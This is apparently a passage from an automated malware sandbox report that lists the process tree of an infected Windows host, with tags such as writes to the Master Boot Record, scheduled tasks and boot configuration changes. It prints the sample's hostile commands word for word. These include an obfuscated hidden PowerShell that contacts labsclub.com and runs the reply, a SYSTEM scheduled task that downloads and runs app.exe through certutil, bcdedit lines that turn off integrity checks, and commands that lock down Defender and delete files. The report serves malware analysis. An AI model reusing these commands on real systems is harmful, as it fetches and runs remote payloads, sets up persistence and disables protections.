        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2968
    - - C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
        
        C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp1
        5⤵
        Executes dropped EXE
        Writes to the Master Boot Record (MBR)
        Suspicious use of SetThreadContext
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:2564
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2652
      - C:\Users\Admin\AppData\Roaming\1614921469223.exe
        
        "C:\Users\Admin\AppData\Roaming\1614921469223.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614921469223.txt"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1376
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        
        PID:4220
      - C:\Users\Admin\AppData\Roaming\1614921486333.exe
        
        "C:\Users\Admin\AppData\Roaming\1614921486333.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614921486333.txt"
        6⤵
        
        PID:4348
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        
        PID:4860
      - C:\Users\Admin\AppData\Roaming\1614921495860.exe
        
        "C:\Users\Admin\AppData\Roaming\1614921495860.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614921495860.txt"
        6⤵
        
        PID:4736
      - C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
        
        C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
        6⤵
        
        PID:4332
      - C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
        
        "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
        6⤵
        
        PID:4604
      - C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
        
        "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
        6⤵
        
        PID:5116
      - C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
        
        "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
        6⤵
        
        PID:2588
    - - C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
        
        C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp1
        5⤵
        Executes dropped EXE
        Writes to the Master Boot Record (MBR)
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:3384
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:1172
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:360
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
        6⤵
        
        PID:4168
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        7⤵
        Runs ping.exe
        
        PID:4228
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
        5⤵
        
        PID:1416
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        6⤵
        Runs ping.exe
        
        PID:200
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
      4⤵
      Executes dropped EXE
      PID:2632
    - - C:\Users\Admin\AppData\Local\Temp\HLSJI7HXLJ\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\HLSJI7HXLJ\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:3168
      - C:\Users\Admin\AppData\Local\Temp\HLSJI7HXLJ\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\HLSJI7HXLJ\multitimer.exe" 1 3.1614921261.6041be2deefa1 101
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4888
        
        C:\Users\Admin\AppData\Local\Temp\HLSJI7HXLJ\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\HLSJI7HXLJ\multitimer.exe" 2 3.1614921261.6041be2deefa1
        7⤵
        Executes dropped EXE
        Checks for any installed AV software in registry
        Maps connected drives based on registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5048
        
        C:\Users\Admin\AppData\Local\Temp\ja0wmqbjxfm\safebits.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ja0wmqbjxfm\safebits.exe" /S /pubid=1 /subid=451
        8⤵
        
        PID:1620
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\DragonFruitSoftware\tmorgm.dll",tmorgm C:\Users\Admin\AppData\Local\Temp\ja0wmqbjxfm\safebits.exe
        9⤵
        
        PID:6664
        
        C:\Users\Admin\AppData\Local\Temp\vs1pdjs51a4\yd1pf4o2tr1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vs1pdjs51a4\yd1pf4o2tr1.exe" /VERYSILENT
        8⤵
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\is-9S1D5.tmp\yd1pf4o2tr1.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9S1D5.tmp\yd1pf4o2tr1.tmp" /SL5="$70060,870426,780800,C:\Users\Admin\AppData\Local\Temp\vs1pdjs51a4\yd1pf4o2tr1.exe" /VERYSILENT
        9⤵
        
        PID:1220
        
        C:\Users\Admin\AppData\Local\Temp\is-U3ERD.tmp\winlthst.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-U3ERD.tmp\winlthst.exe" test1 test1
        10⤵
        
        PID:5212
        
        C:\Users\Admin\AppData\Local\Temp\uNoDgelVO.exe
        
        "C:\Users\Admin\AppData\Local\Temp\uNoDgelVO.exe"
        11⤵
        
        PID:4552
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im uNoDgelVO.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\uNoDgelVO.exe" & del C:\ProgramData\*.dll & exit
        12⤵
        
        PID:6736
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im uNoDgelVO.exe /f
        13⤵
        Kills process with taskkill
        
        PID:6912
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        13⤵
        Delays execution with timeout.exe
        
        PID:3812
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:4308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:1604
        
        C:\Users\Admin\AppData\Local\Temp\cwtnq1qoayb\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cwtnq1qoayb\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:1308
        
        C:\Users\Admin\AppData\Local\Temp\is-SM5VU.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-SM5VU.tmp\vict.tmp" /SL5="$20280,870426,780800,C:\Users\Admin\AppData\Local\Temp\cwtnq1qoayb\vict.exe" /VERYSILENT /id=535
        9⤵
        
        PID:4360
        
        C:\Users\Admin\AppData\Local\Temp\is-U404P.tmp\wimapi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-U404P.tmp\wimapi.exe" 535
        10⤵
        
        PID:5360
        
        C:\Users\Admin\AppData\Local\Temp\sGnSqaW2n.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sGnSqaW2n.exe"
        11⤵
        
        PID:6076
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im sGnSqaW2n.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\sGnSqaW2n.exe" & del C:\ProgramData\*.dll & exit
        12⤵
        
        PID:6856
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im sGnSqaW2n.exe /f
        13⤵
        Kills process with taskkill
        
        PID:6936
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        13⤵
        Delays execution with timeout.exe
        
        PID:3140
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:6604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:6276
        
        C:\Users\Admin\AppData\Local\Temp\uewhkejvnlk\askinstall24.exe
        
        "C:\Users\Admin\AppData\Local\Temp\uewhkejvnlk\askinstall24.exe"
        8⤵
        
        PID:4248
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        9⤵
        
        PID:5412
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        10⤵
        Kills process with taskkill
        
        PID:5648
        
        C:\Users\Admin\AppData\Local\Temp\5alkyj3rr2e\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5alkyj3rr2e\app.exe" /8-23
        8⤵
        
        PID:4380
        
        C:\Users\Admin\AppData\Local\Temp\5alkyj3rr2e\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5alkyj3rr2e\app.exe" /8-23
        9⤵
        
        PID:3300
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        10⤵
        
        PID:4880
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        11⤵
        
        PID:2276
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe /8-23
        10⤵
        
        PID:6976
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        11⤵
        Creates scheduled task(s)
        
        PID:6448
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        11⤵
        Creates scheduled task(s)
        
        PID:6444
        
        C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        11⤵
        
        PID:2276
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6500
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:5276
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6852
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:5408
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:5092
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6456
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6584
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:4740
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:2272
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6792
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:5196
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6096
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:4116
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6948
        
        C:\Windows\System32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:5560
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        11⤵
        
        PID:5320
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        11⤵
        
        PID:6548
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        12⤵
        
        PID:1328
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        13⤵
        
        PID:7004
        
        C:\Users\Admin\AppData\Local\Temp\aoquggcu5fa\1b2xzkzxn4k.exe
        
        "C:\Users\Admin\AppData\Local\Temp\aoquggcu5fa\1b2xzkzxn4k.exe" /ustwo INSTALL
        8⤵
        
        PID:4452
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 652
        9⤵
        Program crash
        
        PID:4356
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 668
        9⤵
        Program crash
        
        PID:4376
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 628
        9⤵
        Program crash
        
        PID:5184
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 492
        9⤵
        Program crash
        
        PID:5332
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 880
        9⤵
        Program crash
        
        PID:5672
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 928
        9⤵
        Program crash
        
        PID:6072
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 1176
        9⤵
        Program crash
        
        PID:4424
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 1188
        9⤵
        Program crash
        
        PID:5188
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 1280
        9⤵
        Program crash
        
        PID:5336
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 1272
        9⤵
        Program crash
        
        PID:5532
        
        C:\Users\Admin\AppData\Local\Temp\uyhdtxb3eli\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\uyhdtxb3eli\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:4520
        
        C:\Users\Admin\AppData\Local\Temp\is-F6SMD.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-F6SMD.tmp\Setup3310.tmp" /SL5="$302B4,802346,56832,C:\Users\Admin\AppData\Local\Temp\uyhdtxb3eli\Setup3310.exe" /Verysilent /subid=577
        9⤵
        
        PID:4544
        
        C:\Users\Admin\AppData\Local\Temp\is-Q7UP8.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-Q7UP8.tmp\Setup.exe" /Verysilent
        10⤵
        
        PID:5776
        
        C:\Users\Admin\AppData\Local\Temp\is-EPUQG.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-EPUQG.tmp\Setup.tmp" /SL5="$301CA,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-Q7UP8.tmp\Setup.exe" /Verysilent
        11⤵
        
        PID:5796
        
        C:\Users\Admin\AppData\Local\Temp\is-SIGE4.tmp\ProPlugin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-SIGE4.tmp\ProPlugin.exe" /Verysilent
        12⤵
        
        PID:5704
        
        C:\Users\Admin\AppData\Local\Temp\is-3MJ2F.tmp\ProPlugin.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3MJ2F.tmp\ProPlugin.tmp" /SL5="$303D6,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-SIGE4.tmp\ProPlugin.exe" /Verysilent
        13⤵
        
        PID:5696
        
        C:\Users\Admin\AppData\Local\Temp\is-KQCET.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-KQCET.tmp\Setup.exe"
        14⤵
        
        PID:5176
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
        15⤵
        
        PID:5008
        
        C:\Windows\regedit.exe
        
        regedit /s chrome.reg
        16⤵
        Runs .reg file with regedit
        
        PID:4220
        
        C:\Windows\SYSTEM32\TASKKILL.exe
        
        TASKKILL /F /IM chrome.exe
        16⤵
        Kills process with taskkill
        
        PID:4648
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\curl.exe
        
        curl.exe "https://script.google.com/macros/s/AKfycbyeDUociDSMjODhy_ZapM5zzyoJ3zrch9n5IUJeKIM3UQOEtZs/exec?ip=154.61.71.51&loc=US&app=Staoism&payoutcents=0.08&ver=3.5" -k
        16⤵
        
        PID:4624
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chrome64.bat
        16⤵
        
        PID:4144
        
        C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
        17⤵
        
        PID:4748
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\chrome64.bat" h"
        18⤵
        
        PID:4576
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:/Program Files/Google/Chrome/Application/chrome.exe"
        19⤵
        
        PID:5488
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffa0fd06e00,0x7ffa0fd06e10,0x7ffa0fd06e20
        20⤵
        
        PID:4304
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1696 /prefetch:2
        20⤵
        
        PID:2676
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1748 /prefetch:8
        20⤵
        
        PID:5460
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2684 /prefetch:1
        20⤵
        
        PID:5192
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2676 /prefetch:1
        20⤵
        
        PID:5612
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
        20⤵
        
        PID:6156
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1
        20⤵
        
        PID:6188
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
        20⤵
        
        PID:6180
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
        20⤵
        
        PID:6172
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4116 /prefetch:8
        20⤵
        
        PID:6756
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4248 /prefetch:8
        20⤵
        
        PID:6800
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4324 /prefetch:8
        20⤵
        
        PID:6344
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4212 /prefetch:8
        20⤵
        
        PID:6328
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4340 /prefetch:8
        20⤵
        
        PID:4556
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3672 /prefetch:8
        20⤵
        
        PID:5564
        
        C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
        20⤵
        
        PID:4940
        
        C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff7368d7740,0x7ff7368d7750,0x7ff7368d7760
        21⤵
        
        PID:5592
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1616 /prefetch:8
        20⤵
        
        PID:7080
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
